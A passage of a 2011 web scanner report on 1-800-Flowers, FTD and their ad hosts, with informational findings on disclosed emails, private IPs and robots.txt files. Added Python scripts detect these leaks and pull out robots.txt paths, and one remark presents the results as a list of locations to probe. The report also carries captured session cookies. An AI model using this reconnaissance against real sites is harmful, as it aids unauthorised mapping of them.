User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.5.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|5|0|0|0|1|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902956353&t2=1304902961198&t3=1304902975503&t4=1304902955083&lti=1304902969048&ln=&hr=javascript%3AsetEvent%28shipping%2CshoppingBasketForm%29&fti=1304902969061&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=o-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:03:06 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00005vXThlkYEPvWrxltBHolJWL:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 19826


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
...[SNIP]...
<div class="n-chk-txtSmall">To ensure you receive your 1-800FLOWERS.COM.. email containing your sign in password please add webmaster@1800flowers.com to your address book now.</div>
...[SNIP]...

19.5. http://www.ftd.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The following email address was disclosed in the response: autorenew@ftdi.com, which appears twice as a mailto: link in the page body. Note that the mailbox is on the ftdi.com domain, not ftd.com, so it also reveals a related domain in use by the organisation.

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 09 May 2011 01:00:16 GMT
X-Varnish: 729964464 729931173
Age: 611
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 134998


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<a href="mailto:autorenew@ftdi.com">autorenew@ftdi.com</a>
...[SNIP]...
<a href="mailto:autorenew@ftdi.com">autorenew@ftdi.com</a>
...[SNIP]...

20. Private IP addresses disclosed
There are 4 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses (10.0.0.0/8, 172.16.0.0/12 and 192.168.0.0/16) that are reserved for use in private networks and are not routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure. In all four instances below the address is in an X-FB-Server response header on Facebook-operated hosts (www.facebook.com and static.ak.fbcdn.net) that the audited retail sites embed for their Like buttons; the disclosure belongs to Facebook's infrastructure and is not something the site owners can remediate.
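Detection for this issue and for issue 19 above, as an added example that is not part of the original report: the scanner below pulls email addresses and RFC 1918 addresses out of a captured response, separates header hits from body hits so a finding can say where the value leaked, and marks role mailboxes such as webmaster@ as published on purpose. SAMPLE_EMAILS is cut down from instances 19.2 and 19.4, SAMPLE_IPS from instance 20.1; the ROLE_MAILBOXES set is an assumed allow-list, not something the report defines. The private-range test is written out explicitly because ipaddress.ip_address(x).is_private also covers loopback, link-local and other non-RFC 1918 ranges and would over-report.

```python
import ipaddress
import re

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")

# Exactly the three RFC 1918 blocks.  ipaddress.ip_address(x).is_private is
# wider (loopback, link-local, 100.64/10 ...) and would over-report.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Assumed allow-list of role mailboxes that sites publish on purpose.
ROLE_MAILBOXES = {"webmaster", "postmaster", "hostmaster", "abuse", "helpdesk",
                  "support", "info", "sales", "noreply", "no-reply"}

# Cut down from 19.2 and 19.4 above: one author credit in a CSS comment,
# one role address in user-facing checkout text.
SAMPLE_EMAILS = """HTTP/1.1 200 OK
Content-Type: text/css

/* Author: Eric Wright <ewright@linescale.com> */
please add webmaster@1800flowers.com to your address book now.
"""

# Cut down from 20.1 above: the private address is in a response header.
SAMPLE_IPS = """HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.147.194
Cache-Control: public, max-age=1264

<!doctype html><html><head><title>XD Proxy</title></head></html>
"""


def is_rfc1918(addr):
    """True only for 10/8, 172.16/12 and 192.168/16; malformed input is not private."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in RFC1918)


def scan_response(raw):
    """Scan one response (headers and body separated by a blank line).
    Returns {'emails': [(address, personal)], 'private_ips': [(address, where)]};
    'personal' is False for role mailboxes, 'where' is 'header' or 'body' so
    the finding says whether a server header or the page content leaked it."""
    head, _, body = raw.partition("\n\n")
    emails = []
    for addr in sorted(set(EMAIL_RE.findall(raw))):
        local = addr.split("@", 1)[0].lower()
        emails.append((addr, local not in ROLE_MAILBOXES))
    private_ips = []
    for where, text in (("header", head), ("body", body)):
        for ip in sorted(set(IPV4_RE.findall(text))):
            if is_rfc1918(ip):
                private_ips.append((ip, where))
    return {"emails": emails, "private_ips": private_ips}


if __name__ == "__main__":
    for name, sample in (("19.x", SAMPLE_EMAILS), ("20.x", SAMPLE_IPS)):
        print(name, scan_response(sample))
```

Against the two samples the scanner reports ewright@linescale.com as personal, webmaster@1800flowers.com as a role mailbox, and 10.30.147.194 as a header-level leak; feed it the raw text of any captured response to reproduce the issue 19 and 20 checks on other hosts.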


20.1. http://static.ak.fbcdn.net/connect/xd_proxy.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.30.147.194, in the X-FB-Server response header, which identifies the back-end server that handled the request.

Request

GET /connect/xd_proxy.php?version=0 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a5dfe874%26origin%3Dhttp%253A%252F%252Fwww.ftd.com%252Ff1fcffb74%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2FFTDFlowers&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.147.194
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=1264
Expires: Mon, 09 May 2011 01:21:48 GMT
Date: Mon, 09 May 2011 01:00:44 GMT
Connection: close
Content-Length: 3017

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

20.2. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.137.43.128, in the X-FB-Server response header.

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a5dfe874%26origin%3Dhttp%253A%252F%252Fwww.ftd.com%252Ff1fcffb74%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2FFTDFlowers&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.137.43.128
X-Cnection: close
Date: Mon, 09 May 2011 01:00:37 GMT
Content-Length: 8755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.3. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.136.4.125, in the X-FB-Server response header.

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3e79c99a8%26origin%3Dhttp%253A%252F%252Fww30.1800flowers.com%252Ff3e64b99ac%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.1800flowers.com%2Ffields-of-europe-mom-91637&layout=standard&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=true&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.4.125
X-Cnection: close
Date: Mon, 09 May 2011 01:08:54 GMT
Elapsed: 0.062
Content-Length: 10927

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.4. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response: 10.136.21.128, in the X-FB-Server response header.

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2ee3cf604%26origin%3Dhttp%253A%252F%252Fww30.1800baskets.com%252Ff1da69ad5%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.1800baskets.com%2Fproduct.do%3FbaseCode%3D93260&layout=standard&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=true&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.21.128
X-Cnection: close
Date: Mon, 09 May 2011 01:10:47 GMT
Elapsed: 0.043
Content-Length: 9907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21. Robots.txt file
There are 34 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.
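A parser for the files listed in this section, as an added example that is not part of the original report: it splits a robots.txt into per-agent groups, treats directive names case-insensitively (the samples mix User-Agent, User-agent and SITEMAP), keeps Sitemap lines apart because they apply to the whole file, and then lists only the Allow, Disallow and Noindex targets that name a specific location, since a bare "/" or an empty value says nothing about the site layout. SAMPLE_DOUBLECLICK, SAMPLE_GOOGLEADS and SAMPLE_FLOWERS are the bodies shown in instances 21.1, 21.9 and 21.10; SAMPLE_APP is constructed to show the case the issue background warns about, and the shop.example host in it is invented.

```python
# Bodies shown in instances 21.1 and 21.9 below.
SAMPLE_DOUBLECLICK = """User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /
"""

SAMPLE_GOOGLEADS = """User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /
"""

# Body shown in instance 21.10 below (comment line, allow-all, sitemap index).
SAMPLE_FLOWERS = """# robots.txt for http://www.1800flowers.com
User-agent: *
Disallow:

SITEMAP: http://www.1800flowers.com/sitemap-index.xml
"""

# Constructed: a file that names locations the owner would rather nobody saw.
SAMPLE_APP = """User-agent: *
Disallow: /admin/
Disallow: /backup/
Disallow: /cgi-bin/
Sitemap: http://shop.example/sitemap.xml
"""


def parse_robots(text):
    """Return (groups, sitemaps).  groups is [(agents, rules)] with rules as
    [(directive, value)]; directive names are matched case-insensitively and
    '#' comments are dropped.  Consecutive User-agent lines share one group,
    and a User-agent line after rules starts a new one.  Sitemap lines apply
    to the whole file, so they are collected separately."""
    groups, sitemaps = [], []
    agents, rules = [], []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        if name == "user-agent":
            if rules:
                groups.append((agents, rules))
                agents, rules = [], []
            agents.append(value)
        elif name == "sitemap":
            sitemaps.append(value)
        else:
            rules.append((name, value))
    if agents or rules:
        groups.append((agents, rules))
    return groups, sitemaps


def interesting_paths(text):
    """Allow/Disallow/Noindex targets that name a specific location, as
    (agents, directive, path).  '/' (everything) and '' (nothing) reveal no
    layout and are skipped; Noindex is non-standard but still names a path."""
    found = []
    groups, _ = parse_robots(text)
    for agents, rules in groups:
        for directive, value in rules:
            if directive in ("allow", "disallow", "noindex") and value not in ("", "/"):
                found.append((", ".join(agents), directive, value))
    return found


if __name__ == "__main__":
    for name, sample in (("21.1", SAMPLE_DOUBLECLICK), ("21.9", SAMPLE_GOOGLEADS),
                         ("21.10", SAMPLE_FLOWERS), ("constructed", SAMPLE_APP)):
        groups, sitemaps = parse_robots(sample)
        print(name, "groups:", groups, "sitemaps:", sitemaps, "review:", interesting_paths(sample))
```

For the three real files the review list is empty or contains only /ads/preferences/, which matches their Information severity; the constructed file yields /admin/, /backup/ and /cgi-bin/, which is exactly the list a tester would walk next. The sitemap URL returned for 21.10 is worth fetching in its own right, since a sitemap index is an owner-maintained list of the site's URLs.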


21.1. http://ad.doubleclick.net/activity

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The web server contains a robots.txt file. It lets AdsBot-Google and MSNPTC crawl everywhere (an empty Disallow) and blocks every other crawler from the whole site (Disallow: /); it names no specific path, so it gives an attacker nothing to map.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Mon, 09 May 2011 01:09:32 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

21.2. http://ads.undertone.com/fc.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /fc.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.undertone.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 08 Apr 2011 22:43:44 GMT
ETag: "3998221-1a-4a06ff54b2800"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Date: Mon, 09 May 2011 01:09:03 GMT
Connection: close

User-agent: *
Disallow: /

21.3. http://adsfac.us/pct_mx.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adsfac.us
Path:   /pct_mx.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adsfac.us

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 30 Sep 2008 00:31:21 GMT
Accept-Ranges: bytes
ETag: "e5e89cdc9322c91:0"
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Mon, 09 May 2011 00:59:32 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

21.4. http://at.amgdgt.com/ads/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /ads/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: at.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:01:13 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 19 Mar 2009 21:31:08 GMT
ETag: "b044005-1a-4657f84ac9f00"
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=172800
Expires: Wed, 11 May 2011 01:01:13 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

21.5. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Tue, 10 May 2011 01:18:23 GMT
Date: Mon, 09 May 2011 01:18:23 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

21.6. http://blooms.1800flowers.com/cm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blooms.1800flowers.com
Path:   /cm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blooms.1800flowers.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:52 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Mon, 16 Apr 2007 20:12:03 GMT
ETag: "24407c-1c-4623d893"
Accept-Ranges: bytes
Content-Length: 28
Keep-Alive: timeout=300, max=889
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

21.7. http://data.cmcore.com/cookie-id.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cmcore.com
Path:   /cookie-id.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: data.cmcore.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:57 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Mon, 16 Apr 2007 20:12:03 GMT
ETag: "371f3c-1c-4623d893"
Accept-Ranges: bytes
Content-Length: 28
Keep-Alive: timeout=300, max=914
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

21.8. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dms.netmng.com
Path:   /si/CM/Tracking/ClickTracking.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dms.netmng.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 13 Apr 2010 14:06:56 GMT
Accept-Ranges: bytes
ETag: "7cd3a49312dbca1:1560"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
P3P: CP="PUB OTRo"
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 01:00:36 GMT
Connection: close

User-agent: *
Disallow: /

21.9. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1014041578/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/1014041578/

Issue detail

The web server contains a robots.txt file. It blocks the whole site except /ads/preferences/ and adds a Noindex directive, which is not part of the original robots.txt convention and is ignored by most crawlers.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 09 May 2011 01:00:59 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

21.10. http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/runtime/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media1.1800flowers.com
Path:   /800f_assets/jet/website/images/flowers/runtime/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: media1.1800flowers.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Fri, 22 Apr 2011 17:45:24 GMT
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Content-Type: text/plain
Content-Language: en-US
Cache-Control: max-age=5400
Date: Mon, 09 May 2011 01:04:10 GMT
Content-Length: 127
Connection: close

# robots.txt for http://www.1800flowers.com
User-agent: *
Disallow:

SITEMAP: http://www.1800flowers.com/sitemap-index.xml

21.11. http://media4.1800flowers.com/800f_assets/jet/website/styles/baskets/martha-tab_sep.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media4.1800flowers.com
Path:   /800f_assets/jet/website/styles/baskets/martha-tab_sep.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: media4.1800flowers.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 25 Apr 2011 14:46:08 GMT
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Content-Type: text/plain
Content-Language: en-US
Cache-Control: max-age=5400
Date: Mon, 09 May 2011 01:17:34 GMT
Content-Length: 127
Connection: close

# robots.txt for http://www.1800flowers.com
User-agent: *
Disallow:

SITEMAP: http://www.1800flowers.com/sitemap-index.xml

21.12. http://media5.1800flowers.com/800f_assets/jet/website/images/flowers/carousel.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media5.1800flowers.com
Path:   /800f_assets/jet/website/images/flowers/carousel.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: media5.1800flowers.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Fri, 22 Apr 2011 17:45:24 GMT
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Content-Type: text/plain
Content-Language: en-US
Cache-Control: max-age=5400
Date: Mon, 09 May 2011 01:00:48 GMT
Content-Length: 127
Connection: close

# robots.txt for http://www.1800flowers.com
User-agent: *
Disallow:

SITEMAP: http://www.1800flowers.com/sitemap-index.xml

21.13. http://media6.1800flowers.com/800f_assets/jet/website/images/baskets/runtime/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media6.1800flowers.com
Path:   /800f_assets/jet/website/images/baskets/runtime/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: media6.1800flowers.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Fri, 22 Apr 2011 17:45:24 GMT
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Content-Type: text/plain
Content-Language: en-US
Cache-Control: max-age=5400
Date: Mon, 09 May 2011 01:16:54 GMT
Content-Length: 127
Connection: close

# robots.txt for http://www.1800flowers.com
User-agent: *
Disallow:

SITEMAP: http://www.1800flowers.com/sitemap-index.xml

21.14. http://metrics.ftd.com/b/ss/ftdprod/1/H.4-pdv-2/s48131725573912

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.ftd.com
Path:   /b/ss/ftdprod/1/H.4-pdv-2/s48131725573912

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.ftd.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:40 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "15d113-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www77
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

